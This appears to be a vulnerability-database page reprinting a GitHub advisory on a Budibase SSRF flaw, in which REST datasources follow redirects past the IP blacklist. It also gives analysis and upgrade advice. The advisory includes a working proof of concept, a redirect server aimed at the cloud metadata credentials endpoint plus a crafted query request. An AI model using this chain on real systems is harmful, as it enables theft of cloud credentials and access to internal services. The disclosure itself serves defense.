Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The REST datasource integration follows HTTP redirects without re-checking the IP blacklist, allowing an authenticated Builder to access internal services (cloud metadata, databases) by redirecting through an attacker-controlled server. The same vulnerability class was already patched in automation steps (fetchWithBlacklist in packages/server/src/automations/steps/utils.ts) but the REST integration was missed.
Details
Vulnerable file: packages/server/src/integrations/rest.ts, lines 754-778
The _req() method checks the request URL against the IP blacklist at line 754, then calls fetch(url, input) at line 778. No redirect: "manual" option is set, so undici's fetch defaults to redirect: "follow", automatically following HTTP 301/302/307 redirects without re-validating the redirect target against the blacklist.
// Line 754 - blacklist check on original URL only
if (await blacklist.isBlacklisted(url)) {
throw new Error("URL is blocked or could not be resolved safely.")
}
// Line 778 - fetch follows redirects, NO re-check on redirect target
response = await fetch(url, input)The automation steps already implement the correct fix in packages/server/src/automations/steps/utils.ts (lines 100-136) via fetchWithBlacklist(), which sets redirect: "manual" and re-checks the blacklist on every redirect hop. The REST integration does not use this safe wrapper.
Relevant prior fix commits on the automation side:
6cfa3bcca3- "fix(server): enforce outbound blacklist in webhook automation steps"e7d47625be- "Fix automation webhook blacklist redirect bypass"
PoC
Step 1 - Set up a redirect server (attacker-controlled):
from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', 'http://169.254.169.254/latest/meta-data/iam/security-credentials/')
self.end_headers()
HTTPServer(('0.0.0.0', 8080), RedirectHandler).serve_forever()Step 2 - As a Builder, create a REST datasource pointing to the attacker's server.
Step 3 - Preview a query:
POST /api/queries/preview HTTP/1.1
Host: <budibase-instance>
Content-Type: application/json
Cookie: <builder-session>
x-budibase-app-id: <app-id>
{
"datasourceId": "<rest-datasource-id>",
"queryVerb": "read",
"fields": {
"path": "http://<attacker-ip>:8080/",
"queryString": "",
"headers": {},
"bodyType": "none",
"requestBody": ""
},
"parameters": [],
"transformer": "return data",
"name": "ssrf-test",
"schema": {}
}Step 4 - The blacklist check passes (attacker IP is public), undici follows the 302 redirect to the internal target, and the response is returned:
{
"rows": [{
"couchdb": "Welcome",
"version": "3.3.3",
"uuid": "a84d3353128485a22973a759df2387bc"
}]
}Tested and confirmed on Budibase v3.34.6 running locally with default blacklist active.
Impact
- Cloud credential theft: On AWS/GCP/Azure instances, attacker accesses
169.254.169.254to steal IAM credentials or service account tokens. - Internal service access: CouchDB (
:4005), Redis (:6379), MinIO (:4004), and other internal services become accessible - Bypasses explicit security control: The IP blacklist exists specifically to prevent this, and works correctly for direct access - only the redirect path is unprotected.
- Already-known vulnerability class: This was previously identified and fixed in automation steps (commits
6cfa3bcca3,e7d47625be) but the REST datasource integration was not patched.
AnalysisAI
Budibase's REST datasource integration before version 3.38.1 bypasses IP blacklist security controls through HTTP redirect following. Authenticated Builder-level users can exploit this to access cloud metadata services and internal databases by redirecting requests through attacker-controlled servers, potentially stealing AWS/GCP/Azure credentials. This vulnerability class was previously fixed in automation steps but the REST integration was overlooked, creating an inconsistent security posture.
Technical ContextAI
Budibase is a low-code platform (npm package @budibase/server) that allows users to create REST datasources for external API integration. The vulnerability exists in the _req() method within packages/server/src/integrations/rest.ts at lines 754-778. The code validates URLs against an IP blacklist to prevent SSRF attacks, but uses undici's fetch() with default redirect: follow behavior. This follows HTTP 301/302/307 redirects without re-validating the redirect target against the blacklist. The root cause is CWE-918 (Server-Side Request Forgery), where user-controlled input influences server-side requests without proper validation of redirect chains.
RemediationAI
Upgrade to Budibase version 3.38.1 or later, which properly validates redirect targets against the IP blacklist. The fix implements redirect: manual handling similar to the existing fetchWithBlacklist wrapper used in automation steps. As a temporary workaround if immediate patching is not possible, restrict Builder role access to trusted users only, monitor REST datasource configurations for suspicious external URLs, and consider implementing network-level controls to block outbound requests from Budibase servers to cloud metadata endpoints (169.254.169.254). Note that workarounds only reduce risk and do not eliminate the vulnerability.
LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exploited in the wild i
UAF in Redis 8.2.1 via crafted Lua scripts by authenticated users. EPSS 12.4%. Patch available.
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific
Memory Corruption was discovered in the cmsgpack library in the Lua subsystem in Redis before 3.2.12, 4.x before 4.0.10,
Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user
Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command.
A buffer overflow in Redis 3.2.x prior to 3.2.4 causes arbitrary code execution when a crafted command is sent. Rated cr
Code injection in OneUptime monitoring via custom JS monitor using vm module. PoC and patch available.
In applications using jfinal 4.9.08 and below, there is a deserialization vulnerability when using redis,may be vulnerab
An issue was found in Apache Airflow versions 1.10.10 and below. Rated critical severity (CVSS 9.8), this vulnerability
An Integer Overflow issue was discovered in the struct library in the Lua subsystem in Redis before 3.2.12, 4.x before 4
goanother Another Redis Desktop Manager =<1.6.1 is vulnerable to Cross Site Scripting (XSS) via src/components/Setting.v
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-32603
GHSA-fgqv-jh4g-pvg2